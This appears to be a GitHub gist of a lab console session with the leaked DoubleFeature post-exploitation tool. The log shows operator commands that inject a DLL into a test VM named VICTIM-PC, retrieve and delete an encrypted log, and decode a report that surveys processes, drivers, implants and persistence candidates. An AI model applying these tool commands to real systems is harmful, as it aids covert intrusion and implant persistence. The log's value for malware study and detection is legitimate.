Created
April 19, 2017 19:05
-
-
Save misterch0c/1ab40e42bd0002afb9cb855f34772556 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Enter menu option: [0] | |
| 3 | |
| Running command 'registryquery -hive l -key "Software\Classes\CLSID\{091FD378-422D-A36E-8487-83B57ADD2109}\TypeLib"' | |
| Failed to open registry key | |
| The system cannot find the file specified. | |
| *** Command indicated failure *** | |
| - Special registry key NOT present. | |
| Continue? | |
| CONTINUE | |
| - | |
| - DOUBLEFEATURE 3.4.3.3 | |
| - Encryption key: 391ce1f7f31a209d8d48260bee5c92a3 | |
| - Log file: C:\Windows\Temp\~yh64762.tmp | |
| - | |
| - 0) Exit | |
| - | |
| - Setup | |
| - 1) Change encryption key | |
| - 2) Change log file | |
| - | |
| - Normal Usage | |
| - 3) Check registry for special UR key | |
| - 4) Run Standard DF query | |
| - 5) Tip-Off UR | |
| - | |
| - Advanced Usage | |
| - 6) Enable UR Debug Logging | |
| - 7) Disable UR Debug Logging | |
| - 8) Kick-start UR | |
| - 9) Shutdown UR | |
| - 10) Toggle FA Mode | |
| - | |
| - God Mode | |
| - 11) Run a DF3 dll you already configured | |
| - 12) Manually configure DF. Still uses the above log file and key. Make sure you know what you're doing here | |
| - | |
| Enter menu option: [0] | |
| 4 | |
| - Running the DF Standard query | |
| - Configuring the Dll with options: -a 391ce1f7f31a209d8d48260bee5c92a3 -l... | |
| - Ready to run tool... | |
| Do you want to run command 'dllload -ordinal 1 -library D:\DSZOPSDisk\Resources\\Df\Uploads\i386-winnt\DoubleFeatureDll.dll.configured'? | |
| YES | |
| Running command 'dllload -ordinal 1 -library D:\DSZOPSDisk\Resources\\Df\Uploads\i386-winnt\DoubleFeatureDll.dll.configured' | |
| Module 123 already loaded (addr=z0.0.0.26) - Load count 6 | |
| Module loaded | |
| Module 114 already loaded (addr=z0.0.0.26) - Load count 2 | |
| Module loaded | |
| Loading module 106 (addr=z0.0.0.26 | type=dsz | file=Mcl_ThreadInject_Std.dll) | |
| Module loaded | |
| Loading module 299 (addr=z0.0.0.26 | type=dsz | file=DllLoad_Target.dll) | |
| Module loaded | |
| Dll : D:\DSZOPSDisk\Resources\Df\Uploads\i386-winnt\DoubleFeatureDll.dll.configured | |
| Dll Size : 397824 bytes | |
| --Sending 397824 of 397824 total bytes | |
| Dll loaded at 0x017c0000 | |
| Dll unloaded | |
| Command completed successfully | |
| - Finished. | |
| Running command 'dir "C:\Windows\Temp\~yh64762.tmp"' | |
| Directory : C:\Windows\Temp | |
| 2017-04-19 19:02:52 A 26,756 ~yh64762.tmp | |
| Directory listing complete | |
| Do you want to run command 'foreground get "C:\Windows\Temp\~yh64762.tmp" -name DFReport_'? | |
| YES | |
| - Log file moved into NOSEND. | |
| Do you want to run command 'delete -file "C:\Windows\Temp\~yh64762.tmp"'? | |
| YES | |
| - Auto-parsing DoubleFeature log... | |
| Running command 'local run -redirect -output oem -command "D:\DSZOPSDisk\Resources\\Df\Tools\i386-winnt\DoubleFeatureReader.exe D:\Logs\test\z0.0.0.26\GetFiles/NOSEND/DFReport_00484-GetFile_all_2017_04_19_19h03m11s.294.get 391ce1f7f31a209d8d48260bee5c92a3"' | |
| Process started with id 3868 | |
| DoubleFeature Reader Version...................done (3.4.3.3) | |
| Processing Arguments...........................done | |
| Initializing Decryptor.........................done | |
| Initializing Modules (may include stubs): | |
| Implant Independent Module.............done | |
| Special Implant Indicators Module......done | |
| Straitbizarre..........................done | |
| UnitedRake.............................done | |
| FlewAvenue.............................done | |
| CritterFrenzy..........................done | |
| DiveBar................................done | |
| DuneMessiah............................done | |
| Opening the DoubleFeature log file.............done (D:\Logs\test\z0.0.0.26\GetFiles/NOSEND/DFReport_00484-GetFile_all_2017_04_19_19h03m11s.294.get) | |
| DoubleFeature Target Version...................done (3.4.3.3) | |
| Creating the Report File.......................done () | |
| Decrypting the log file........................done | |
| Buffering the log file.........................done | |
| Parsing the log file...........................done | |
| Deinitializing Decryptor.......................done | |
| Closing the log file...........................done | |
| Preparing to display the report................done | |
| Closing the report file........................done | |
| ImplantIndependent: | |
| Operating System Version: | |
| Major Version: 6 | |
| Minor Version: 1 | |
| Service Pack Major Version: 1 | |
| Service Pack Minor Version: 0 | |
| System Information: | |
| Architecture Type: x86 | |
| Number Of Processors: 1 | |
| Page Size: 4096 | |
| Allocation Granularity: 65536 | |
| DoubleFeature Process ID: 464 | |
| System Partition: \Device\HarddiskVolume1 | |
| System Directory: %%SystemRoot%%\system32 | |
| System Root Directory: C:\Windows | |
| Default User Name: victim | |
| System Time: | |
| Local: 04/19/2017 12:02:47 | |
| UTC: 04/19/2017 19:02:47 | |
| System Uptime: 0 yrs, 0 wks, 0 days, 0 hrs, 17 mins, 37 secs | |
| ControlSet Info: | |
| Current Control Set: 1 | |
| Default Control Set: 1 | |
| Failed Control Set: 0 | |
| LKG Control Set: 2 | |
| Registry Size: | |
| Current Size: 42297868 | |
| Maximum Size: 714429781 | |
| Environment Variables: | |
| ALLUSERSPROFILE: C:\ProgramData | |
| CommonProgramFiles: C:\Program Files\Common Files | |
| COMPUTERNAME: VICTIM-PC | |
| ComSpec: C:\Windows\system32\cmd.exe | |
| FP_NO_HOST_CHECK: NO | |
| NUMBER_OF_PROCESSORS: 1 | |
| OS: Windows_NT | |
| Path: C:\Windows\System32 | |
| PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC | |
| PROCESSOR_ARCHITECTURE: x86 | |
| PROCESSOR_IDENTIFIER: x86 Family 6 Model 61 Stepping 4, GenuineIntel | |
| PROCESSOR_LEVEL: 6 | |
| PROCESSOR_REVISION: 3d04 | |
| ProgramData: C:\ProgramData | |
| ProgramFiles: C:\Program Files | |
| PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ | |
| PUBLIC: C:\Users\Public | |
| SystemDrive: C: | |
| SystemRoot: C:\Windows | |
| TEMP: C:\Windows\TEMP | |
| TMP: C:\Windows\TEMP | |
| USERNAME: SYSTEM | |
| USERPROFILE: C:\Windows\system32\config\systemprofile | |
| windir: C:\Windows | |
| windows_tracing_flags: 3 | |
| windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log | |
| Adapter Info: | |
| Adapter: | |
| Name: {C63B0135-2C21-412E-92E7-A6FEB149081E} | |
| Description: Intel(R) PRO/1000 MT Desktop Adapter | |
| Address: 08-00-27-bb-ef-c8 | |
| Type: Ethernet | |
| Ips: | |
| IP Address: 192.168.0.249 | |
| IP Mask: 255.255.255.0 | |
| GateWays: | |
| GateWay: 192.168.0.1 | |
| DHCP Enabled: Yes | |
| DHCP Server: 192.168.0.1 | |
| Uses Wins: No | |
| Crash Dump Info: | |
| Dumps Enabled: Kernel Dump | |
| Full Dump Path: C:\Windows\MEMORY.DMP | |
| Mini Dump Path: C:\Windows\Minidump | |
| Full Dump Exists: No | |
| Num Mini Dumps: 0 | |
| Process Listing: | |
| ProcessList_0: | |
| pid: 0 | |
| ppid: 0 | |
| tcnt: 1 | |
| name: [System Process] | |
| ProcessList_4: | |
| pid: 4 | |
| ppid: 0 | |
| tcnt: 90 | |
| name: System | |
| ProcessList_248: | |
| pid: 248 | |
| ppid: 4 | |
| tcnt: 2 | |
| name: smss.exe | |
| ProcessList_324: | |
| pid: 324 | |
| ppid: 316 | |
| tcnt: 9 | |
| name: csrss.exe | |
| ProcessList_360: | |
| pid: 360 | |
| ppid: 316 | |
| tcnt: 3 | |
| name: wininit.exe | |
| ProcessList_368: | |
| pid: 368 | |
| ppid: 352 | |
| tcnt: 7 | |
| name: csrss.exe | |
| ProcessList_396: | |
| pid: 396 | |
| ppid: 352 | |
| tcnt: 3 | |
| name: winlogon.exe | |
| ProcessList_456: | |
| pid: 456 | |
| ppid: 360 | |
| tcnt: 7 | |
| name: services.exe | |
| ProcessList_464: | |
| pid: 464 | |
| ppid: 360 | |
| tcnt: 34 | |
| name: lsass.exe | |
| ProcessList_472: | |
| pid: 472 | |
| ppid: 360 | |
| tcnt: 11 | |
| name: lsm.exe | |
| ProcessList_560: | |
| pid: 560 | |
| ppid: 456 | |
| tcnt: 10 | |
| name: svchost.exe | |
| ProcessList_624: | |
| pid: 624 | |
| ppid: 456 | |
| tcnt: 12 | |
| name: VBoxService.exe | |
| ProcessList_676: | |
| pid: 676 | |
| ppid: 456 | |
| tcnt: 8 | |
| name: svchost.exe | |
| ProcessList_760: | |
| pid: 760 | |
| ppid: 456 | |
| tcnt: 22 | |
| name: svchost.exe | |
| ProcessList_836: | |
| pid: 836 | |
| ppid: 456 | |
| tcnt: 22 | |
| name: svchost.exe | |
| ProcessList_872: | |
| pid: 872 | |
| ppid: 456 | |
| tcnt: 19 | |
| name: svchost.exe | |
| ProcessList_908: | |
| pid: 908 | |
| ppid: 456 | |
| tcnt: 38 | |
| name: svchost.exe | |
| ProcessList_1216: | |
| pid: 1216 | |
| ppid: 456 | |
| tcnt: 24 | |
| name: svchost.exe | |
| ProcessList_1324: | |
| pid: 1324 | |
| ppid: 456 | |
| tcnt: 13 | |
| name: spoolsv.exe | |
| ProcessList_1352: | |
| pid: 1352 | |
| ppid: 456 | |
| tcnt: 17 | |
| name: svchost.exe | |
| ProcessList_1440: | |
| pid: 1440 | |
| ppid: 456 | |
| tcnt: 20 | |
| name: svchost.exe | |
| ProcessList_2040: | |
| pid: 2040 | |
| ppid: 456 | |
| tcnt: 11 | |
| name: taskhost.exe | |
| ProcessList_356: | |
| pid: 356 | |
| ppid: 836 | |
| tcnt: 3 | |
| name: dwm.exe | |
| ProcessList_468: | |
| pid: 468 | |
| ppid: 328 | |
| tcnt: 19 | |
| name: explorer.exe | |
| ProcessList_1660: | |
| pid: 1660 | |
| ppid: 456 | |
| tcnt: 11 | |
| name: SearchIndexer.exe | |
| ProcessList_1112: | |
| pid: 1112 | |
| ppid: 468 | |
| tcnt: 13 | |
| name: VBoxTray.exe | |
| ProcessList_2304: | |
| pid: 2304 | |
| ppid: 468 | |
| tcnt: 1 | |
| name: cmd.exe | |
| ProcessList_2312: | |
| pid: 2312 | |
| ppid: 368 | |
| tcnt: 2 | |
| name: conhost.exe | |
| ProcessList_2456: | |
| pid: 2456 | |
| ppid: 456 | |
| tcnt: 13 | |
| name: wmpnetwk.exe | |
| ProcessList_2644: | |
| pid: 2644 | |
| ppid: 456 | |
| tcnt: 10 | |
| name: svchost.exe | |
| ProcessList_3528: | |
| pid: 3528 | |
| ppid: 456 | |
| tcnt: 6 | |
| name: mscorsvw.exe | |
| ProcessList_3556: | |
| pid: 3556 | |
| ppid: 456 | |
| tcnt: 4 | |
| name: sppsvc.exe | |
| ProcessList_3592: | |
| pid: 3592 | |
| ppid: 456 | |
| tcnt: 13 | |
| name: svchost.exe | |
| ProcessList_2144: | |
| pid: 2144 | |
| ppid: 468 | |
| tcnt: 9 | |
| name: iexplore.exe | |
| ProcessList_2136: | |
| pid: 2136 | |
| ppid: 908 | |
| tcnt: 3 | |
| name: wuauclt.exe | |
| ProcessList_2808: | |
| pid: 2808 | |
| ppid: 2144 | |
| tcnt: 25 | |
| name: iexplore.exe | |
| ProcessList_3108: | |
| pid: 3108 | |
| ppid: 456 | |
| tcnt: 5 | |
| name: taskhost.exe | |
| Loaded Driver List: | |
| Driver: ntoskrnl.exe | |
| Driver: halacpi.dll | |
| Driver: kdcom.dll | |
| Driver: mcupdate_GenuineIntel.dll | |
| Driver: PSHED.dll | |
| Driver: BOOTVID.dll | |
| Driver: CLFS.SYS | |
| Driver: CI.dll | |
| Driver: Wdf01000.sys | |
| Driver: WDFLDR.SYS | |
| Driver: ACPI.sys | |
| Driver: WMILIB.SYS | |
| Driver: msisadrv.sys | |
| Driver: pci.sys | |
| Driver: vdrvroot.sys | |
| Driver: partmgr.sys | |
| Driver: compbatt.sys | |
| Driver: BATTC.SYS | |
| Driver: volmgr.sys | |
| Driver: volmgrx.sys | |
| Driver: mountmgr.sys | |
| Driver: atapi.sys | |
| Driver: ataport.SYS | |
| Driver: msahci.sys | |
| Driver: PCIIDEX.SYS | |
| Driver: amdxata.sys | |
| Driver: fltmgr.sys | |
| Driver: fileinfo.sys | |
| Driver: Ntfs.sys | |
| Driver: msrpc.sys | |
| Driver: ksecdd.sys | |
| Driver: cng.sys | |
| Driver: VBoxGuest.sys | |
| Driver: pcw.sys | |
| Driver: Fs_Rec.sys | |
| Driver: ndis.sys | |
| Driver: NETIO.SYS | |
| Driver: ksecpkg.sys | |
| Driver: tcpip.sys | |
| Driver: fwpkclnt.sys | |
| Driver: vmstorfl.sys | |
| Driver: volsnap.sys | |
| Driver: spldr.sys | |
| Driver: rdyboost.sys | |
| Driver: mup.sys | |
| Driver: hwpolicy.sys | |
| Driver: fvevol.sys | |
| Driver: disk.sys | |
| Driver: CLASSPNP.SYS | |
| Driver: cdrom.sys | |
| Driver: Null.SYS | |
| Driver: Beep.SYS | |
| Driver: vga.sys | |
| Driver: VIDEOPRT.SYS | |
| Driver: watchdog.sys | |
| Driver: RDPCDD.sys | |
| Driver: rdpencdd.sys | |
| Driver: rdprefmp.sys | |
| Driver: Msfs.SYS | |
| Driver: Npfs.SYS | |
| Driver: tdx.sys | |
| Driver: TDI.SYS | |
| Driver: afd.sys | |
| Driver: netbt.sys | |
| Driver: wfplwf.sys | |
| Driver: pacer.sys | |
| Driver: netbios.sys | |
| Driver: VBoxSF.sys | |
| Driver: wanarp.sys | |
| Driver: termdd.sys | |
| Driver: rdbss.sys | |
| Driver: nsiproxy.sys | |
| Driver: mssmbios.sys | |
| Driver: discache.sys | |
| Driver: csc.sys | |
| Driver: dfsc.sys | |
| Driver: blbdrive.sys | |
| Driver: tunnel.sys | |
| Driver: i8042prt.sys | |
| Driver: kbdclass.sys | |
| Driver: VBoxMouse.sys | |
| Driver: mouclass.sys | |
| Driver: VBoxVideo.sys | |
| Driver: E1G60I32.sys | |
| Driver: HDAudBus.sys | |
| Driver: usbohci.sys | |
| Driver: USBPORT.SYS | |
| Driver: CmBatt.sys | |
| Driver: CompositeBus.sys | |
| Driver: AgileVpn.sys | |
| Driver: rasl2tp.sys | |
| Driver: ndistapi.sys | |
| Driver: ndiswan.sys | |
| Driver: raspppoe.sys | |
| Driver: raspptp.sys | |
| Driver: rassstp.sys | |
| Driver: rdpbus.sys | |
| Driver: swenum.sys | |
| Driver: ks.sys | |
| Driver: umbus.sys | |
| Driver: usbhub.sys | |
| Driver: NDProxy.SYS | |
| Driver: HdAudio.sys | |
| Driver: portcls.sys | |
| Driver: drmk.sys | |
| Driver: cdfs.sys | |
| Driver: crashdmp.sys | |
| Driver: dump_dumpata.sys | |
| Driver: dump_msahci.sys | |
| Driver: dump_dumpfve.sys | |
| Driver: win32k.sys | |
| Driver: Dxapi.sys | |
| Driver: dxg.sys | |
| Driver: monitor.sys | |
| Driver: TSDDD.dll | |
| Driver: VBoxDisp.dll | |
| Driver: hidusb.sys | |
| Driver: HIDCLASS.SYS | |
| Driver: HIDPARSE.SYS | |
| Driver: USBD.SYS | |
| Driver: mouhid.sys | |
| Driver: luafv.sys | |
| Driver: lltdio.sys | |
| Driver: rspndr.sys | |
| Driver: HTTP.sys | |
| Driver: bowser.sys | |
| Driver: mpsdrv.sys | |
| Driver: mrxsmb.sys | |
| Driver: mrxsmb10.sys | |
| Driver: mrxsmb20.sys | |
| Driver: fsprtx.SYS | |
| Driver: peauth.sys | |
| Driver: secdrv.SYS | |
| Driver: srvnet.sys | |
| Driver: tcpipreg.sys | |
| Driver: srv2.sys | |
| Driver: srv.sys | |
| Driver: rdpdr.sys | |
| Driver: tdtcp.sys | |
| Driver: tssecsrv.sys | |
| Driver: RDPWD.SYS | |
| Driver: spsys.sys | |
| Driver: ntdll.dll | |
| Driver: smss.exe | |
| Driver: apisetschema.dll | |
| Driver: autochk.exe | |
| Driver: nsi.dll | |
| Driver: kernel32.dll | |
| Driver: clbcatq.dll | |
| Driver: ws2_32.dll | |
| Driver: sechost.dll | |
| Driver: comdlg32.dll | |
| Driver: gdi32.dll | |
| Driver: psapi.dll | |
| Driver: lpk.dll | |
| Driver: rpcrt4.dll | |
| Driver: shlwapi.dll | |
| Driver: urlmon.dll | |
| Driver: setupapi.dll | |
| Driver: msctf.dll | |
| Driver: user32.dll | |
| Driver: difxapi.dll | |
| Driver: imagehlp.dll | |
| Driver: msvcrt.dll | |
| Driver: iertutil.dll | |
| Driver: ole32.dll | |
| Driver: shell32.dll | |
| Driver: imm32.dll | |
| Driver: wininet.dll | |
| Driver: normaliz.dll | |
| Driver: advapi32.dll | |
| Driver: oleaut32.dll | |
| Driver: Wldap32.dll | |
| Driver: usp10.dll | |
| Driver: api-ms-win-downlevel-shlwapi-l1-1-0.dll | |
| Driver: api-ms-win-downlevel-advapi32-l1-1-0.dll | |
| Driver: devobj.dll | |
| Driver: api-ms-win-downlevel-normaliz-l1-1-0.dll | |
| Driver: userenv.dll | |
| Driver: cfgmgr32.dll | |
| Driver: wintrust.dll | |
| Driver: crypt32.dll | |
| Driver: api-ms-win-downlevel-version-l1-1-0.dll | |
| Driver: comctl32.dll | |
| Driver: KernelBase.dll | |
| Driver: api-ms-win-downlevel-user32-l1-1-0.dll | |
| Driver: api-ms-win-downlevel-ole32-l1-1-0.dll | |
| Driver: profapi.dll | |
| Driver: msasn1.dll | |
| Special: | |
| StraitBizarre: | |
| UnitedRake: | |
| Status: Not Running | |
| 4.0.X- Driver(MSNDSRV) Status: Not Running (OKAY if 4.1.X or newer client) | |
| 4.1.X+ Driver(ATMDKDRV) Status: Not Running (OKAY if 4.0.X or earlier client.) | |
| Tipoff: Not Sent | |
| UR3 Logging: OFF | |
| UR4 Logging: OFF | |
| UR4 KillSuit Logging: OFF | |
| Legacy: | |
| Crash Count: Not Found | |
| Driver Start Flags: Not Found | |
| FlewAvenue: | |
| Legacy: | |
| Crash Count: <NO VALUE> | |
| Start Flags: Not Found | |
| KillSuit: | |
| Status: Not Running | |
| CritterFrenzy: | |
| DiveBar: | |
| KillSuit: | |
| Launcher Search: | |
| Launcher Candidates: | |
| Candidate: | |
| Name: acpipmi | |
| Size: 10240 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: beep | |
| Size: 6144 | |
| Service: Yes | |
| Start: 1 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: errdev | |
| Size: 7168 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: mskssrv | |
| Size: 8320 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: mspclock | |
| Size: 5888 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: mspqm | |
| Size: 5504 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: mstee | |
| Size: 6144 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: parvdm | |
| Size: 8704 | |
| Service: Yes | |
| Start: 2 | |
| Type: 1 | |
| Param: Yes | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: RDPCDD | |
| Size: 6656 | |
| Service: Yes | |
| Start: 1 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: RDPENCDD | |
| Size: 6656 | |
| Service: Yes | |
| Start: 1 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: RDPREFMP | |
| Size: 7168 | |
| Service: Yes | |
| Start: 1 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: rootmdm | |
| Size: 8192 | |
| Service: No | |
| Start: No | |
| Type: No | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: umpass | |
| Size: 8192 | |
| Service: Yes | |
| Start: 3 | |
| Type: 1 | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: usbd | |
| Size: 6016 | |
| Service: No | |
| Start: No | |
| Type: No | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: vms3cap | |
| Size: 5632 | |
| Service: No | |
| Start: No | |
| Type: No | |
| Param: No | |
| Data: No | |
| ISF: No | |
| Candidate: | |
| Name: wfplwf | |
| Size: 9728 | |
| Service: Yes | |
| Start: 1 | |
| Type: 1 | |
| Param: Yes | |
| Data: No | |
| ISF: No | |
| Launcher Thunks: | |
| Minimum Size: 5500 | |
| Maximum Size: 11000 | |
| DiveBar Instance Count: 0 | |
| KSModule Store Root: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\NetworkCfg | |
| SolarTime: | |
| Hash of Selected Range: 0x431BF4C2 | |
| Boot GUID: {660FB706-0B00-660F-B61E-0D0066F7E366} | |
| MultiLauncher: | |
| Service Name: <NO VALUE> | |
| Registry Key: <NO VALUE> | |
| Registry Value: <NO VALUE> | |
| Thunks: | |
| Persistence Compatibility: | |
| LAUNCHER: | |
| Compatible: YES | |
| Reason: | |
| SolarTime/MultiLauncher: | |
| Compatible: YES | |
| Reason: | |
| JUVI: | |
| Compatible: NO | |
| Reason: JUVI OS Not Supported. | |
| DuneMessiah: | |
| Expected Dune Messiah Event Name: Global\{B24107D9-D3F5-F719-F719-B24107D948E9} | |
| DuneMessiah event present: No | |
| DuneMessiah Registered Killsuit Count: 0 | |
| Input File Name: D:\Logs\test\z0.0.0.26\GetFiles/NOSEND/DFReport_00484-GetFile_all_2017_04_19_19h03m11s.294.get | |
| Double Feature Reader Version: 3.4.3.3 | |
| Double Feature Target Version: 3.4.3.3 | |
| Command Line Options: | |
| Arguments: | |
| Option: | |
| Option: -a | |
| Parameters: 391ce1f7f31a209d8d48260bee5c92a3 | |
| Option: | |
| Option: -l | |
| Parameters: | |
| Number Of Arguments: 2 | |
| Process terminated with status 0 | |
| Command completed successfully | |
| Continue? | |
| CONTINUE | |
| - | |
| - DOUBLEFEATURE 3.4.3.3 | |
| - Encryption key: 391ce1f7f31a209d8d48260bee5c92a3 | |
| - Log file: C:\Windows\Temp\~yh64762.tmp | |
| - | |
| - 0) Exit | |
| - | |
| - Setup | |
| - 1) Change encryption key | |
| - 2) Change log file | |
| - | |
| - Normal Usage | |
| - 3) Check registry for special UR key | |
| - 4) Run Standard DF query | |
| - 5) Tip-Off UR | |
| - | |
| - Advanced Usage | |
| - 6) Enable UR Debug Logging | |
| - 7) Disable UR Debug Logging | |
| - 8) Kick-start UR | |
| - 9) Shutdown UR | |
| - 10) Toggle FA Mode | |
| - | |
| - God Mode | |
| - 11) Run a DF3 dll you already configured | |
| - 12) Manually configure DF. Still uses the above log file and key. Make sure you know what you're doing here |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment